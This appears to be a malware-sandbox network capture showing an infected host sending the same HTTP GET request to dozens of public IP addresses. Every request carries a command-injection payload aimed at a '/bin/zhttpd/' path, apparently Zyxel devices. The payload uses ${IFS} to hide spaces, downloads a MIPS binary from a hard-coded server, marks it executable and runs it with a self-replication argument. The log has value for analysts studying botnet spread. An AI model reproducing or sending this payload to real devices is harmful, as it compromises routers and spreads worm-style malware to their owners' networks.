                                                  Jan 19, 2024 18:23:55.036019087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4198192.168.2.1360392117.169.218.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036056995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4199192.168.2.1343816187.140.252.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036082029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4200192.168.2.135179662.0.1.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036139011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4201192.168.2.1353000105.121.152.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036191940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4202192.168.2.1351970156.24.84.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036222935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4203192.168.2.1339768130.107.157.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036276102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4204192.168.2.1345586124.217.197.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036314964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4205192.168.2.1354680212.16.88.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036335945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4206192.168.2.1352150131.253.0.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036385059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4207192.168.2.134380479.129.81.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036425114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4208192.168.2.1349916196.243.72.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036474943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4209192.168.2.1357614143.30.7.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036504984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4210192.168.2.1353280165.106.152.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036539078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4211192.168.2.1357716120.82.32.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036581993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4212192.168.2.134236097.124.18.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036618948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4213192.168.2.134023691.69.58.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036653996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4214192.168.2.1360584137.3.183.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036700964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4215192.168.2.1347904129.204.107.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036736012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4216192.168.2.134396636.94.196.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036787033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4217192.168.2.1345466157.133.124.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036808014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4218192.168.2.1356490115.202.44.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036849976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4219192.168.2.135009487.126.143.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036901951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4220192.168.2.1355600106.54.29.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036952972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4221192.168.2.1342634156.91.170.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.036983013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4222192.168.2.1359868136.164.193.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037023067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4223192.168.2.133975487.141.195.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037070990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4224192.168.2.1337972114.186.133.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037101030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4225192.168.2.1359780141.18.229.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037134886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4226192.168.2.1340272162.174.221.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037200928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4227192.168.2.133423249.151.70.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037241936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4228192.168.2.133842477.50.234.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037282944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4229192.168.2.135249686.246.227.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037311077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4230192.168.2.135612839.225.76.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037344933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4231192.168.2.133886263.52.22.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037395000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4232192.168.2.135200676.211.79.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037445068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4233192.168.2.1354730190.119.188.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037467957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4234192.168.2.1348968145.152.61.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037507057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4235192.168.2.1340798217.234.87.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037560940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4236192.168.2.135022284.252.250.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037597895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4237192.168.2.1351196212.206.140.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037638903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4238192.168.2.134342866.24.126.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037667036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4239192.168.2.134011885.36.75.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037715912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4240192.168.2.135742894.28.95.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037758112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4241192.168.2.1350936179.153.4.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037774086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4242192.168.2.1338246132.8.168.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037817001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4243192.168.2.1336528149.213.66.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037859917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4244192.168.2.1359762155.14.23.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037904024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4245192.168.2.1346326137.250.135.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037941933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4246192.168.2.135428470.182.153.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.037981033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4247192.168.2.134923889.223.22.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.038017988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4248192.168.2.135274838.46.227.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.038073063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4249192.168.2.133826689.233.8.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.038120031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4250192.168.2.1350552139.215.39.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.038162947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4251192.168.2.1357812199.211.232.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.038199902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4252192.168.2.1343200189.39.138.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.038245916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4253192.168.2.13603188.171.169.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.038291931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4254192.168.2.1357280131.87.167.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.038321972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4255192.168.2.134979892.33.81.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.038358927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4256192.168.2.134565280.56.147.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.038409948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4257192.168.2.133491450.169.122.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.038458109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4258192.168.2.1336230161.196.254.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.038491964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4259192.168.2.1341336115.225.46.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.038544893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4260192.168.2.134241219.15.26.97443
                                                  TimestampBytes transferredDirectionData
